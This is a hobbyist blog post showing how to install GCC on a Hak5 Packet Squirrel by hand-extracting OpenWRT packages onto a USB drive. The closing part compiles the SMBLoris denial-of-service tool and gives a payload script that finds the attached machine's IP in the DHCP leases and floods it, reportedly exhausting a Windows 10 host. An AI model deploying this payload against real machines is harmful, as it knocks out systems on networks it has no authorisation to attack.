Packet Squirrel GCC and SMBLoris

Since the hardware footprint of the Packet Squirrel is so limited (2 MB for root filesystem  / and 30 MB for tempfs  /tmp) I have decided to find a way how to get GCC compiler and the needed libraries onto the Packet Squirrel without the native opkg package manager.

I have attached an 8 GB USB flash drive to the Packet Squirrel and formatted it from there as EXT4 /dev/sda1 partition

Disk /dev/sda: 7807 MB, 7807401984 bytes
250 heads, 5 sectors/track, 12199 cylinders
Units = cylinders of 1250 * 512 = 640000 bytes

Device Boot Start End Blocks Id System
/dev/sda1 1 12199 7624372+ 83 Linux

/dev/sda1 gets automounted on /mnt upon boot so we can use this extra space for the GCC and other dependencies

Since I did not want to go through the cross-compilation on my x86_64 Linux machine to get the mips binaries I have downloaded the precompiled packages from OpenWRT to my x86_64 Linux laptop

The following packages are needed to get C code to compile natively on the Packet Squirrel


Once the packages are downloaded upload them via scp to the Packet Squirrel to the /mnt partition

scp *.ipk root@

Login to the Packet Squirrel via ssh

ssh root@ 
root@squirrel:~# mkdir /mnt/tt 
root@squirrel:~# mv /mnt/*.ipk /mnt/tt

And here is what I did with each ipk package separately on the /mnt/tt
The below is pretty self explanatory, since the ipk is a Gzipped Tarball really
containing other tarballs.

root@squirrel:/mnt/tt# mv libbfd_2.24-3_ar71xx.ipk libbfd_2.24-3_ar71xx.tar.gz
root@squirrel:/mnt/tt# rm -rf b2/
root@squirrel:/mnt/tt# gunzip libbfd_2.24-3_ar71xx.tar.gz 
root@squirrel:/mnt/tt# tar -xvf libbfd_2.24-3_ar71xx.tar 

We are only interested in the data.tar.gz which contains the compiled binaries
and libraries, so we create a directory called libbfd and move the
data.tar.gz there for extraction

root@squirrel:/mnt/tt# rm debian-binary 
root@squirrel:/mnt/tt# rm control.tar.gz 
root@squirrel:/mnt/tt# rm libbfd_2.24-3_ar71xx.tar 
root@squirrel:/mnt/tt# mkdir libbfd
root@squirrel:/mnt/tt# mv data.tar.gz libbfd/
root@squirrel:/mnt/tt# cd libbfd/
root@squirrel:/mnt/tt/libbfd# ls
root@squirrel:/mnt/tt/libbfd# tar -zxvf data.tar.gz 
root@squirrel:/mnt/tt/libbfd# ls -la
drwxr-xr-x 3 root root 4096 Jul 14 02:11 .
drwxr-xr-x 7 root root 4096 Jul 14 02:10 ..
-rw-r--r-- 1 107 111 393581 Jan 31 2016 data.tar.gz
drwxr-xr-x 3 root root 4096 Jul 14 02:11 usr
root@squirrel:/mnt/tt/libbfd# rm data.tar.gz 
root@squirrel:/mnt/tt/libbfd# cd usr/
root@squirrel:/mnt/tt/libbfd/usr# cd lib/
root@squirrel:/mnt/tt/libbfd/usr/lib# ls -al
drwxr-xr-x 2 root root 4096 Jul 14 02:11 .
drwxr-xr-x 3 root root 4096 Jul 14 02:11 ..
-rwxr-xr-x 1 root root 935260 Jan 31 2016
lrwxrwxrwx 1 root root 14 Jul 14 02:11 ->

Next we need to create symlinks from the / root filesystem to the extracted binaries
and libraries on the /mnt USB Flash partition

root@squirrel:/mnt/tt/libbfd/usr/lib# pwd
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/ /usr
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/ /usr

We repeat the same process for the following packages


Once we are done with these we can finally move on to the extraction of GCC ipk package

root@squirrel:/mnt/tt/gcc/usr# ls -al
drwxr-xr-x 5 root root 4096 Jul 14 02:06 .
drwxr-xr-x 3 root root 4096 Jul 14 02:39 ..
drwxr-xr-x 2 root root 4096 Jul 14 02:06 bin
drwxr-xr-x 3 root root 4096 Jul 14 02:06 include
drwxr-xr-x 3 root root 4096 Jul 14 02:06 lib

root@squirrel:/mnt/tt/gcc/usr/include# ls -al 
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 c++

So we create a complete directory symlink to /mnt/tt/gcc/include
from /usr on the root filesystem of Packet Squirrel like so

root@squirrel:/mnt/tt/gcc/usr/include# ls -la include
lrwxrwxrwx 1 root root 25 Jul 14 02:11 include -> /mnt/tt/gcc/usr/include/

Next we do the same for the /mnt/tt/gcc/usr/lib/gcc directory

root@squirrel:/mnt/tt/gcc/usr/lib# ls -al
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 gcc

root@squirrel:/usr/lib# ls -la gcc
lrwxrwxrwx 1 root root 25 Jul 14 02:11 gcc -> /disk/tt/gcc/usr/lib/gcc/

So by now you should have a fully working GCC compiler on the Packet Squirrel , you can try run/compile some code (SMBLoris.c for example) that you scp to the device

root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc -v
Using built-in specs.
Target: mips-openwrt-linux-uclibc
Configured with: /home/buildbot/slave-local/ar71xx_generic/build/build_dir/target-mips_34kc_uClibc- --target=mips-openwrt-linux --host=mips-openwrt-linux --build=x86_64-linux-gnu --program-prefix= --program-suffix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --sysconfdir=/etc --datadir=/usr/share --localstatedir=/var --mandir=/usr/man --infodir=/usr/info --disable-nls --build=x86_64-linux-gnu --host=mips-openwrt-linux-uclibc --target=mips-openwrt-linux-uclibc --enable-languages=c,c++ --with-bugurl= --with-pkgversion='OpenWrt GCC 4.8.3' --enable-shared --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --disable-nls --disable-libmudflap --disable-multilib --disable-libgomp --disable-libquadmath --disable-libssp --disable-decimal-float --disable-libstdcxx-pch --with-host-libstdcxx=-lstdc++ --prefix=/usr --libexecdir=/usr/lib --with-float=soft
Thread model: posix
gcc version 4.8.3 (OpenWrt GCC 4.8.3)
root@squirrel:/mnt/tt/gcc/usr/bin#./gcc /mnt/smbloris.c -o /mnt/smbloris

The smbloris.c is taken from Hector Marcan’s github here

The following Packet Squirrel code can be used to launch SMBLoris attack from this device onto the local network on which it is connected, set it to switch 1/2/3

# Set the network mode to NAT 
sleep 5

# You may want to increase your local conntrack limit
echo 1200000 > /proc/sys/net/netfilter/nf_conntrack_max

# Get the IP address for the connected target machine 
ip="$(cat /var/dhcp.leases | awk '{print $3}')"

# Execute smbloris against the target IP 
/mnt/smbloris eth0 $ip &

I have tested this against the latest Windows 10 64bit  version 10.0.16299.19 on a physical hardware, the CPU gets to 100 %, memory jumps high as you can see on the video below

Im sure there might be some other tools that can be used in a similar manner (Exploit code written in C for example and compiled on the Packet Squirrel.. the possibilities are endless)

Nevertheless this was a fun exercise


About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.